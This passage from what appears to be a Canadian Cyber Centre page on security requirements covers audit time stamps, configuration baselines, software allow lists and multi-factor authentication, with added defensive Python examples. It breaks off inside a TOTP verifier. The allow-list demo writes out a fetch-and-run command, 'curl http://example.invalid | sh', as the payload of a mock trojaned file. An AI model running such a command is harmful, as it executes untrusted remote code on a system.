Correlating audit record review, analysis, and reporting processes helps to ensure that they collectively create a more complete view of events.</p> <h5>References</h5> <p>Source controls: AU-06, AU-06(03)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/86/final">NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/101/r1/final">NIST SP 800-101 Guidelines on Mobile Device Forensics </a></li> </ul></details><details><summary><h4 id="03-03-06">03.03.06 Audit record reduction and report generation</h4> </summary><ol class="lst-upr-alph"><li>Implement an audit record reduction and report generation capability that supports audit record review, analysis, reporting requirements, and after-the-fact investigations of incidents</li> <li>Preserve the original content and time ordering of audit records</li> </ol><h5>Discussion</h5> <p>Audit records are generated in <a href="#03-03-03">Audit record generation 03.03.03</a>. Audit record reduction and report generation occur after audit record generation. Audit record reduction is a process that manipulates collected audit information and organizes it in a summary format that is more meaningful to analysts. Audit record reduction and report generation capabilities do not always come from the same system or organizational entities that conduct auditing activities. An audit record reduction capability can include, for example, modern data mining techniques with advanced data filters to identify anomalous behaviour in audit records. The report generation capability provided by the system can help generate customizable reports. 
The time ordering of audit records can be a significant issue if the granularity of the time stamp in the record is insufficient.</p> <h5>References</h5> <p>Source control: AU-07<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-07">03.03.07 Time stamps</h4> </summary><ol class="lst-upr-alph"><li>Use internal system clocks to generate time stamps for audit records</li> <li>Record time stamps for audit records that meet [Assignment: organization-defined granularity of time measurement] and that use Coordinated Universal Time (UTC), have a fixed local time offset from <abbr title="Coordinated Universal Time">UTC</abbr>, or include the local time offset as part of the time stamp</li> </ol><h5>Discussion</h5> <p>Time stamps generated by the system include the date and time. Time is commonly expressed in <abbr title="Coordinated Universal Time">UTC</abbr> or local time with an offset from <abbr title="Coordinated Universal Time">UTC</abbr>. The granularity of time measurements refers to the degree of synchronization between system clocks and reference clocks (e.g., clocks synchronizing within hundreds or tens of milliseconds). Organizations may define different time granularities for system components. 
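</p> <p>The following is an added example, not Cyber Centre or NIST code, covering both requirement b of 03.03.07 and the time-ordering caveat of 03.03.06: it rejects audit record time stamps that carry no UTC offset, normalizes the rest to UTC before records from different sources are correlated, and shows how records whose stamps collide at the configured granularity can still be kept in generation order with a per-source sequence number. The source names, sequence numbers and stamps are constructed for the example.</p>

```python
"""Audit record time stamps and ordering (added example, not Cyber Centre code).

Stamps must be UTC or carry a UTC offset, are normalized to UTC before
correlation, and records that collide at the configured granularity are
ordered by a per-source sequence number. All record values are constructed.
"""
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# Constructed sample: (source, per-source sequence number, stamp as emitted)
SAMPLE_RECORDS = [
    ("web01", 1, "2025-11-25T10:00:00.250-05:00"),  # local time with offset
    ("web01", 2, "2025-11-25T10:00:00.250-05:00"),  # same stamp, later event
    ("db01", 7, "2025-11-25T15:00:00Z"),            # UTC
    ("vpn", 3, "2025-11-25T15:00:01+00:00"),        # UTC, explicit offset
    ("legacy", 1, "2025-11-25 09:59:59"),           # no offset: ambiguous
]


def parse_stamp(raw: str) -> datetime:
    """Parse an ISO 8601 stamp and return it in UTC; reject stamps without an offset."""
    dt = datetime.fromisoformat(raw.replace("Z", "+00:00"))  # 'Z' parses natively only on 3.11+
    if dt.utcoffset() is None:
        raise ValueError(f"time stamp {raw!r} carries no UTC offset")
    return dt.astimezone(timezone.utc)


def order_records(records, granularity: timedelta):
    """Sort records for review and report what the stamps alone cannot order.

    Returns (ordered, rejected, collisions):
      ordered    - (utc_time, source, seq, raw) sorted by (bucket, source, seq),
                   where bucket is the UTC stamp truncated to `granularity`
      rejected   - records whose stamp has no offset, with the reason
      collisions - bucket start -> [(source, seq)] for buckets holding more than one record
    """
    ordered, rejected = [], []
    for source, seq, raw in records:
        try:
            ordered.append((parse_stamp(raw), source, seq, raw))
        except ValueError as err:
            rejected.append((source, seq, raw, str(err)))

    def bucket(utc: datetime) -> int:
        return (utc - EPOCH) // granularity  # exact integer arithmetic, no float rounding

    # The sequence number is the only thing that orders two records with equal buckets.
    ordered.sort(key=lambda r: (bucket(r[0]), r[1], r[2]))
    groups: Dict[int, List[Tuple[str, int]]] = {}
    for utc, source, seq, _ in ordered:
        groups.setdefault(bucket(utc), []).append((source, seq))
    collisions = {EPOCH + b * granularity: members
                  for b, members in groups.items() if len(members) > 1}
    return ordered, rejected, collisions


def demo(granularity_seconds: float):
    """Run the constructed sample at the given granularity (1 for seconds, 0.001 for ms)."""
    return order_records(SAMPLE_RECORDS, timedelta(seconds=granularity_seconds))


if __name__ == "__main__":
    for g in (1, 0.001):
        ordered, rejected, collisions = demo(g)
        print(f"granularity {g}s: {len(collisions)} colliding bucket(s), {len(rejected)} rejected")
        for utc, source, seq, raw in ordered:
            print(f"  {utc.isoformat()}  {source}#{seq}  (was {raw})")
```

<p>At one-second granularity three records from two sources fall into the same bucket and only the sequence number separates the two web01 events; at one-millisecond granularity the db01 record separates out, but the two web01 records still collide because they carry the same stamp. The legacy record is reported rather than silently placed, since without an offset its position relative to the others is unknowable.</p> <p>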
Time service can be critical to other security capabilities (e.g., access control, and identification and authentication), depending on the nature of the mechanisms used to support those capabilities.</p> <h5>References</h5> <p>Source control: AU-08<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-08">03.03.08 Protection of audit information</h4> </summary><ol class="lst-upr-alph"><li>Protect audit information and audit logging tools from unauthorized access, modification, and deletion</li> <li>Authorize access to management of audit logging functionality to only a subset of privileged users or roles</li> </ol><h5>Discussion</h5> <p>Audit information includes the information needed to successfully audit system activity, such as audit records, audit log settings, audit reports, and personal information. Audit logging tools are programs and devices used to conduct audit and logging activities. The protection of audit information focuses on technical protection and limits the ability to access and execute audit logging tools to authorized individuals. The physical protection of audit information is addressed by media and physical protection requirements.</p> <p>Individuals or roles with privileged access to a system and who are also the subject of an audit by that system may affect the reliability of the audit information by inhibiting audit activities or modifying audit records. 
Requiring privileged access to be further defined between audit-related privileges and other privileges limits the number of users or roles with audit-related privileges.</p> <h5>References</h5> <p>Source controls: AU-09, AU-09(04)<br /> Supporting publications: None</p> </details><h4 id="03-03-09">03.03.09 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> </section> <section><h3 class="h2 mrgn-tp-lg" id="3-4">3.4 Configuration management</h3> <p>The Configuration management controls support the management and control of all components of the system such as hardware, software, and configuration items.</p> <details><summary><h4 id="03-04-01">03.04.01 Baseline configuration</h4> </summary><ol class="lst-upr-alph"><li>Develop and maintain under 
configuration control, a current baseline configuration of the system</li> <li>Review and update the baseline configuration of the system [Assignment: organization-defined frequency] and when system components are installed or modified</li> </ol><h5>Discussion</h5> <p>Baseline configurations for the system and system components include aspects of connectivity, operation, and communications. Baseline configurations are documented, formally reviewed, and agreed-upon specifications for the system or configuration items within it. Baseline configurations serve as a basis for future builds, releases, or changes to the system and include information about system components, operational procedures, network topology, and the placement of components in the system architecture. Maintaining baseline configurations requires creating new baselines as the system changes over time. Baseline configurations of the system reflect the current enterprise architecture. If the system facilitates the collection or use of personal information, baseline configurations should include providing privacy notice to users.</p> <h5>References</h5> <p>Source control: CM-02<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-02">03.04.02 Configuration settings</h4> </summary><ol class="lst-upr-alph"><li>Establish, document, and implement the following configuration settings for the system that reflect the most restrictive mode consistent with operational requirements: [Assignment: organization-defined configuration settings]</li> <li>Identify, document, and approve any deviations from established configuration settings.</li> 
</ol><h5>Discussion</h5> <p>Configuration settings are the set of parameters that can be changed in hardware, software, or firmware components of the system which affect the security and privacy posture or functionality of the system. Security-related configuration settings can be defined for systems (e.g., servers, workstations), input and output devices (e.g., scanners, copiers, printers), network components (e.g., firewalls, routers, gateways, voice and data switches, wireless access points, network appliances, sensors), operating systems, middleware, and applications.</p> <p>Security parameters are those that impact the security state of the system, including the parameters required to satisfy other security requirements. Security parameters include registry settings; account, file, and directory permission settings (i.e., privileges); and settings for functions, ports, protocols, and remote connections. Privacy parameters are parameters impacting the privacy posture of systems, including those required to satisfy other privacy controls. Privacy parameters include settings for access controls, personal information, data accuracy requirements, data manipulation capabilities, data processing preferences, and information handling and retention permissions. Organizations establish organization-wide configuration settings and subsequently derive specific configuration settings for the system. The established settings become part of the system’s configuration baseline.</p> <p>Common secure configurations (also referred to as security configuration checklists, lockdown and hardening guides, security reference guides, and security technical implementation guides) provide recognized, standardized, and established benchmarks that stipulate secure configuration settings for specific <abbr title="information technology">IT</abbr> platforms/products and instructions for configuring those system components to meet operational requirements. 
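</p> <p>The following is an added example, not Cyber Centre or NIST code, serving 03.04.01 and 03.04.02 together: a Python check that compares the configuration a host reports against the organization-defined baseline and reports only drift that no approved, documented deviation covers (item b), together with settings the baseline never mentions. The setting names, hosts, values and change-ticket identifiers are constructed for the example and are not any vendor's real parameter names.</p>

```python
"""Configuration baseline drift check (added example, not Cyber Centre code).

Compares observed settings with the baseline under configuration control
and reports drift that is not covered by an approved deviation. Setting
names, hosts, values and ticket ids are constructed for the example.
"""
from typing import Dict, List, Optional, Tuple

# Organization-defined baseline: the most restrictive values that still
# meet operational requirements (constructed).
BASELINE: Dict[str, str] = {
    "ssh.password_auth": "no",
    "ssh.permit_root_login": "no",
    "tls.min_version": "1.2",
    "svc.ftp.enabled": "no",
    "audit.enabled": "yes",
}

# Approved deviations (03.04.02 b): (host, setting, value) -> approval record.
APPROVED_DEVIATIONS: Dict[Tuple[str, str, str], str] = {
    ("legacy-app01", "tls.min_version", "1.1"): "CHG-0001 (constructed)",
}

# What each host reported in a constructed collection run.
OBSERVED: Dict[str, Dict[str, str]] = {
    "web01": {"ssh.password_auth": "yes", "ssh.permit_root_login": "no",
              "tls.min_version": "1.2", "svc.ftp.enabled": "no", "audit.enabled": "yes"},
    "legacy-app01": {"ssh.password_auth": "no", "ssh.permit_root_login": "no",
                     "tls.min_version": "1.1", "svc.ftp.enabled": "yes"},
}

# (setting, expected, actual, status, note)
Finding = Tuple[str, str, Optional[str], str, str]


def check_host(host: str, observed: Dict[str, str],
               baseline: Dict[str, str] = BASELINE,
               approved: Dict[Tuple[str, str, str], str] = APPROVED_DEVIATIONS) -> List[Finding]:
    """Return every baseline setting that is missing, drifted, or an approved deviation.

    Settings that match the baseline produce no finding; settings the host
    reports but the baseline does not define are flagged so the baseline
    can be updated (03.04.01 b) or the setting removed.
    """
    findings: List[Finding] = []
    for setting, expected in baseline.items():
        actual = observed.get(setting)
        if actual is None:
            findings.append((setting, expected, None, "missing",
                             "setting not reported; treat as drift until verified"))
        elif actual == expected:
            continue
        elif (host, setting, actual) in approved:
            findings.append((setting, expected, actual, "approved_deviation",
                             approved[(host, setting, actual)]))
        else:
            findings.append((setting, expected, actual, "unapproved_drift",
                             "no approved deviation covers this value"))
    for setting in sorted(set(observed) - set(baseline)):
        findings.append((setting, "", observed[setting], "unbaselined",
                         "setting not in baseline; add it to the baseline or remove it"))
    return findings


def drift_report(observed_by_host: Dict[str, Dict[str, str]] = OBSERVED) -> Dict[str, Dict[str, int]]:
    """Count findings per host by status; 'unapproved_drift' and 'missing' need action."""
    report: Dict[str, Dict[str, int]] = {}
    for host, observed in observed_by_host.items():
        counts: Dict[str, int] = {}
        for _, _, _, status, _ in check_host(host, observed):
            counts[status] = counts.get(status, 0) + 1
        report[host] = counts
    return report


if __name__ == "__main__":
    for host, observed in OBSERVED.items():
        for setting, expected, actual, status, note in check_host(host, observed):
            print(f"{host:14} {setting:24} expected={expected!r:6} actual={actual!r:6} {status}: {note}")
```

<p>Keying approved deviations by host, setting and value means a deviation approved for one host does not silently excuse the same value elsewhere, and a later change to a different value on the approved host shows up as new drift rather than inheriting the old approval.</p> <p>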
Common secure configurations can be developed by a variety of organizations, including <abbr title="information technology">IT</abbr> product developers, manufacturers, vendors, consortia, academia, industry, federal departments and agencies, and other organizations in the public and private sectors.</p> <h5>References</h5> <p>Source control: CM-06<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/70/r4/final">NIST SP 800-70 National Checklist Program for <abbr title="information technology">IT</abbr> Products: Guidelines for Checklist Users and Developers </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/126/r3/final">NIST SP 800-126 The Technical Specification for the Security Content Automation Protocol (SCAP): SCAP Version 1.3 </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems</a></li> </ul></details><details><summary><h4 id="03-04-03">03.04.03 Configuration change control</h4> </summary><ol class="lst-upr-alph"><li>Define the types of changes to the system that are configuration-controlled</li> <li>Review proposed configuration-controlled changes to the system and approve or disapprove such changes with explicit consideration for security impacts</li> <li>Implement and document approved configuration-controlled changes to the system</li> <li>Monitor and review activities associated with configuration-controlled changes to the system</li> </ol><h5>Discussion</h5> <p>Configuration change control refers to tracking, reviewing, approving or disapproving, and logging changes to the system. 
Specifically, it involves the systematic proposal, justification, implementation, testing, review, and disposition of changes to the system, including system upgrades and modifications. Configuration change control includes changes to baseline configurations for system components (e.g., operating systems, applications, firewalls, routers, mobile devices) and configuration items of the system, changes to configuration settings, unscheduled and unauthorized changes, and changes to remediate vulnerabilities. This requirement is related to <a href="#03-04-04">Impact analyses 03.04.04</a>.</p> <h5>References</h5> <p>Source control: CM-03<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-04">03.04.04 Impact analyses</h4> </summary><ol class="lst-upr-alph"><li>Analyze the security and privacy impacts of changes to the system prior to implementation</li> <li>Verify that the security requirements for the system continue to be satisfied after the system changes have been implemented</li> </ol><h5>Discussion</h5> <p>Organizational personnel with security or privacy responsibilities conduct impact analyses that include reviewing security and privacy plans, policies, and procedures to understand security and privacy requirements; reviewing system design documentation and operational procedures to understand how system changes might affect the security and privacy state of the system; reviewing the impacts of changes on supply chain partners with stakeholders; and determining how potential changes to a system create new risks to the privacy of individuals, and the ability to mitigate those risks. 
Impact analyses also include risk assessments to understand the impacts of changes and to determine whether additional security or privacy requirements are needed. Changes to the system may affect the safeguards and countermeasures previously implemented. This requirement is related to <a href="#03-04-03">Configuration change control 03.04.03</a>. Not all changes to the system are configuration controlled.</p> <h5>References</h5> <p>Source controls: CM-04, CM-04(02)<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems</a></p> </details><details><summary><h4 id="03-04-05">03.04.05 Access restrictions for change</h4> </summary><p>Define, document, approve, and enforce physical and logical access restrictions associated with changes to the system.</p> <h5>Discussion</h5> <p>Changes to the hardware, software, or firmware components of the system or the operational procedures related to the system can have potentially significant effects on the security of the system or individuals’ privacy. Therefore, organizations permit only qualified and authorized individuals to access the system for the purpose of initiating changes. 
Access restrictions include physical and logical access controls, software libraries, workflow automation, media libraries, abstract layers (i.e., changes implemented into external interfaces rather than directly into the system), and change windows (i.e., changes occur only during specified times).</p> <h5>References</h5> <p>Source control: CM-05<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules </a></li> <li><a href="https://csrc.nist.gov/pubs/fips/186-5/final">NIST FIPS 186-5 Digital Signature Standard (DSS) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-06">03.04.06 Least functionality</h4> </summary><ol class="lst-upr-alph"><li>Configure the system to provide only mission-essential capabilities</li> <li>Prohibit or restrict use of the following functions, ports, protocols, connections, and services: [Assignment: organization-defined functions, ports, protocols, connections, and services]</li> <li>Review the system [Assignment: organization-defined frequency] to identify unnecessary or nonsecure functions, ports, protocols, connections, and services</li> <li>Disable or remove functions, ports, protocols, connections, and services that are unnecessary or nonsecure</li> </ol><h5>Discussion</h5> <p>Systems can provide a variety of functions and services. Some functions and services that are routinely provided by default may not be necessary to support essential organizational missions, functions, or operations. It may be convenient to provide multiple services from single system components. However, doing so increases risk over limiting the services provided by any one component. 
Where feasible, organizations limit functionality to a single function per component.</p> <p>Organizations review the functions and services provided by the system or system components to determine which functions and services are candidates for elimination. Organizations disable unused or unnecessary physical and logical ports and protocols to prevent the unauthorized connection of devices, transfer of information, and tunneling. Organizations can employ network scanning tools, intrusion detection and prevention systems, and endpoint protection systems (e.g., firewalls and host-based intrusion detection systems) to identify and prevent the use of prohibited functions, ports, protocols, system connections, and services. Bluetooth, File Transfer Protocol (FTP), and peer-to-peer networking are examples of the types of protocols that organizations consider eliminating, restricting, or disabling.</p> <h5>References</h5> <p>Source controls: CM-07, CM-07(01)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/application-allow-list-itsap10095">Cyber Centre Application Allow Lists (ITSAP.10.095) </a></li> <li><a href="/en/top-top-10-it-security-action-items-no-10-implement-application-allow-lists-itsm10095">Cyber Centre Top 10 <abbr title="information technology">IT</abbr> security action items: No. 
10 Implement application allow lists (ITSM.10.095) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems </a></li> <li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> </ul></details><h4 id="03-04-07">03.04.07 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-04-08">03.04.08 Authorized software – allow by exception</h4> </summary><ol class="lst-upr-alph"><li>Identify software programs authorized to execute on the system</li> <li>Implement a deny-all, allow-by-exception policy for the execution of software programs on the system</li> <li>Review and update the list of authorized software programs [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>If provided with the necessary privileges, users can install software in organizational systems. To maintain control over the software installed, organizations identify permitted and prohibited actions regarding software installation. Permitted software installations include updates and security patches to existing software and downloading new applications from organization-approved “app stores.” The policies selected for governing user-installed software are organization-developed or provided by an external entity. Policy enforcement methods can include procedural methods and automated methods.</p> <p>Authorized software programs can be limited to specific versions or from a specific source. To facilitate a comprehensive authorized software process and increase the strength of protection against attacks that bypass application-level authorized software, software programs may be decomposed into and monitored at different levels of detail. 
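</p> <p>As an added example of the deny-all, allow-by-exception policy in item b (not code from this publication, from NIST, or from any allow-listing product), the Python below keys the allow list on the SHA-256 digest of each file rather than on its path or name, so a renamed, copied or modified binary does not match and a patched version must be approved again. The same digest check is what the media inspection in <a href="#03-07-04">Maintenance tools 03.07.04</a> describes for diagnostic and test programs. The approved tool, the tampered copy and the unknown file are constructed in a temporary directory; their names, versions and source labels are assumptions.</p>

```python
"""Deny-all, allow-by-exception execution check keyed on file hash.

Added example for 03.04.08 (and the media hash check in 03.07.04); not Cyber
Centre or NIST code and not any product's allow-list format. Sample files are
constructed in a temporary directory so the script runs offline.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class AllowEntry:
    sha256: str     # hex digest of the approved file contents
    name: str       # human-readable name for the review list (item c)
    version: str    # item a allows limiting entries to specific versions
    source: str     # where the approved copy came from (vendor, internal repo)


def sha256_of(path, chunk=1 << 16):
    """Hash the file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


class ExecutionPolicy:
    """Deny by default: a file may run only if its digest is on the allow list."""

    def __init__(self, entries):
        self._by_hash = {e.sha256: e for e in entries}

    def decide(self, path):
        """Return (allowed, reason). Every error resolves to deny, never to allow."""
        try:
            digest = sha256_of(path)
        except OSError as exc:
            return False, f"deny: cannot read {path}: {exc}"
        entry = self._by_hash.get(digest)
        if entry is None:
            return False, f"deny: {os.path.basename(path)} sha256={digest[:16]}... not on allow list"
        return True, f"allow: {entry.name} {entry.version} from {entry.source}"


def demo():
    """Constructed sample: approve one file, then decide on the approved file,
    a same-named copy with different contents, and an unknown file."""
    with tempfile.TemporaryDirectory() as d:
        approved = os.path.join(d, "backup-agent")
        with open(approved, "wb") as f:
            f.write(b"#!/bin/sh\necho approved backup agent v2.1\n")
        # Looks like the approved tool but carries an extra command (hypothetical trojan).
        tampered = os.path.join(d, "backup-agent.new")
        with open(tampered, "wb") as f:
            f.write(b"#!/bin/sh\necho approved backup agent v2.1\ncurl http://example.invalid | sh\n")
        unknown = os.path.join(d, "game")
        with open(unknown, "wb") as f:
            f.write(b"#!/bin/sh\necho not approved\n")

        policy = ExecutionPolicy([
            AllowEntry(sha256_of(approved), "backup-agent", "2.1", "internal-repo"),
        ])
        return [policy.decide(p)[0] for p in (approved, tampered, unknown)]


if __name__ == "__main__":
    print(demo())  # [True, False, False]
```

<p>The decision function resolves every error to deny: an unreadable file or a missing list entry never results in execution. Entries carry a version and a source so that the review in item c can retire superseded digests instead of letting the list grow without bound.</p> <p>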
These levels include applications, application programming interfaces, application modules, scripts, system processes, system services, kernel functions, registries, drivers, and dynamic link libraries.</p> <h5>References</h5> <p>Source control: CM-07(05)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/application-allow-list-itsap10095">Cyber Centre Application Allow Lists (ITSAP.10.095) </a></li> <li><a href="/en/top-top-10-it-security-action-items-no-10-implement-application-allow-lists-itsm10095">Cyber Centre Top 10 <abbr title="information technology">IT</abbr> security action items: No. 10 Implement application allow lists (ITSM.10.095) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems </a></li> </ul></details><h4 id="03-04-09">03.04.09 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-04-10">03.04.10 System component inventory</h4> </summary><ol class="lst-upr-alph"><li>Develop and document an inventory of system components</li> <li>Review and update the system component inventory [Assignment: organization-defined frequency]</li> <li>Update the system component inventory as part of installations, removals, and system updates</li> </ol><h5>Discussion</h5> <p>System components are discrete, identifiable assets (i.e., hardware, software, and firmware elements) that compose a system. Organizations may implement centralized system component inventories that include components from all systems. In such situations, organizations ensure that the inventories include system-specific information required for component accountability. 
The information necessary for effective accountability of system components includes the system name, software owners, software version numbers, hardware inventory specifications, software license information — and for networked components — the machine names and network addresses for all implemented protocols (e.g., IPv4, IPv6). Inventory specifications include component type, physical location, date of receipt, manufacturer, cost, model, serial number, and supplier information.</p> <h5>References</h5> <p>Source controls: CM-08, CM-08(01)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-11">03.04.11 Information location</h4> </summary><ol class="lst-upr-alph"><li>Identify and document the location of specified information and the system components on which the information is processed and stored.</li> <li>Document changes to the system or system component location where specified information is processed and stored.</li> </ol><h5>Discussion</h5> <p>Information location addresses the need to understand the specific system components where specified information is being processed and stored and the users who have access to specified information so that appropriate protection mechanisms can be provided, including information flow controls, access controls, and information management.</p> <h5>References</h5> <p>Source control: CM-12<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-04-12">03.04.12 System and component configuration for high-risk areas</h4> </summary><ol class="lst-upr-alph"><li>Issue systems or system components with the following configurations to individuals 
traveling to high-risk locations: [Assignment: organization-defined system configurations].</li> <li>Apply the following security requirements to the system or system components when the individuals return from travel: [Assignment: organization-defined security requirements].</li> </ol><h5>Discussion</h5> <p>When it is known that a system or a specific system component will be in a high-risk area, additional security requirements may be needed to counter the increased threat. Organizations can implement protective measures on systems or system components used by individuals departing on and returning from travel. Actions include determining locations of concern, defining the required configurations for the components, ensuring that the components are configured as intended before travel is initiated, and taking additional actions after travel is completed. For example, systems going into high-risk areas can be configured with sanitized hard drives, limited applications, and more stringent configuration settings. 
Actions applied to mobile devices upon return from travel include examining the device for signs of physical tampering and purging and reimaging the device storage.</p> <h5>References</h5> <p>Source control: CM-02(07)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-5">3.5 Identification and authentication</h3> <p>The Identification and authentication controls support the unique identification of users, processes acting on behalf of users and devices. 
They also support the authentication or verification of the identities of those users, processes or devices as a prerequisite to allowing access to organizational systems.</p> <details><summary><h4 id="03-05-01">03.05.01 User identification, authentication, and re-authentication</h4> </summary><ol class="lst-upr-alph"><li>Uniquely identify and authenticate system users and associate that unique identification with processes acting on behalf of those users</li> <li>Re-authenticate users when [Assignment: organization-defined circumstances or situations requiring re-authentication]</li> </ol><h5>Discussion</h5> <p>System users include individuals (or system processes acting on behalf of individuals) who are authorized to access a system. Typically, individual identifiers are the usernames associated with the system accounts assigned to those individuals. Since system processes execute on behalf of groups and roles, organizations may require the unique identification of individuals in group accounts or accountability of individual activity. 
The unique identification and authentication of users applies to all system accesses. Organizations employ passwords, physical authenticators, biometrics, or some combination thereof to authenticate user identities. Organizations may re-authenticate individuals in certain situations, including when roles, authenticators, or credentials change; when the execution of privileged functions occurs; after a fixed time period; or periodically.</p> <h5>References</h5> <p>Source controls: IA-02, IA-11<br /> Supporting publications: <a href="https://www.cyber.gc.ca/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><details><summary><h4 id="03-05-02">03.05.02 Device identification and authentication</h4> </summary><p>Uniquely identify and authenticate [Assignment: organization-defined devices or types of devices] before establishing a system connection.</p> <h5>Discussion</h5> <p>Devices that require unique device-to-device identification and authentication are defined by type, device, or a combination of type and device. Organization-defined device types include devices that are not owned by the organization. Systems use shared known information (e.g., Media Access Control [MAC], Transmission Control Protocol/Internet Protocol [TCP/IP] addresses) for device identification or organizational authentication solutions (e.g., Institute of Electrical and Electronics Engineers [IEEE] 802.1x and Extensible Authentication Protocol [EAP], RADIUS server with EAP-Transport Layer Security [TLS] authentication, Kerberos) to identify and authenticate devices on local and wide area networks. 
Public Key Infrastructure (PKI) and certificate revocation checking for the certificates exchanged can also be included as part of device authentication.</p> <h5>References</h5> <p>Source control: IA-03<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031) </a></p> </details><details><summary><h4 id="03-05-03">03.05.03 Multi-factor authentication</h4> </summary><p>Implement strong multi-factor authentication (MFA) for access to privileged and non-privileged accounts.</p> <h5>Discussion</h5> <p>This requirement applies to user accounts. Multi-factor authentication requires the use of two or more different factors to achieve authentication. The authentication factors are defined as follows: something you know (e.g., a personal identification number [PIN]), something you have (e.g., a physical authenticator, such as a cryptographic private key), or something you are (e.g., a biometric). Multi-factor authentication solutions that feature physical authenticators include hardware authenticators that provide time-based or challenge-response outputs and smart cards. 
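</p> <p>As an added example (not code from this publication or from NIST) of a time-synchronous one-time authenticator, and of the replay resistance that <a href="#03-05-04">Replay-resistant authentication 03.05.04</a> requires, the Python below implements RFC 6238 TOTP on top of RFC 4226 HOTP. The verifier accepts one time step of clock drift on either side and records the last accepted step per user, so a captured code cannot be replayed inside the validity window. The shared secret is the RFC 6238 test-vector secret, included only so the output can be checked against the RFC; the user names and the window size are assumptions.</p>

```python
"""Time-based one-time authenticator (RFC 6238) with a validation window and
replay rejection.

Added example for the time-synchronous authenticators in 03.05.03, the replay
resistance in 03.05.04 and the validation window setting in 03.05.12. Not
Cyber Centre or NIST code. The secret is the RFC 6238 test vector, not a
real credential.
"""
import hashlib
import hmac
import struct
import time

STEP = 30      # seconds per time step
DIGITS = 6
WINDOW = 1     # accept +/-1 step of clock drift (assumed organization-defined value)


def hotp(secret, counter, digits=DIGITS):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % (10 ** digits):0{digits}d}"


def totp(secret, at, step=STEP):
    """Code for the time step that contains Unix time `at`."""
    return hotp(secret, int(at) // step)


class TotpVerifier:
    """Server side. Remembers the highest accepted time step per user so a
    captured code is rejected if presented again within the window (RFC 6238 s.5.2)."""

    def __init__(self, secret, window=WINDOW, step=STEP):
        self.secret = secret
        self.window = window
        self.step = step
        self.last_step = {}   # user -> highest time step already used

    def verify(self, user, code, now=None):
        now = time.time() if now is None else now
        current = int(now) // self.step
        for drift in range(-self.window, self.window + 1):
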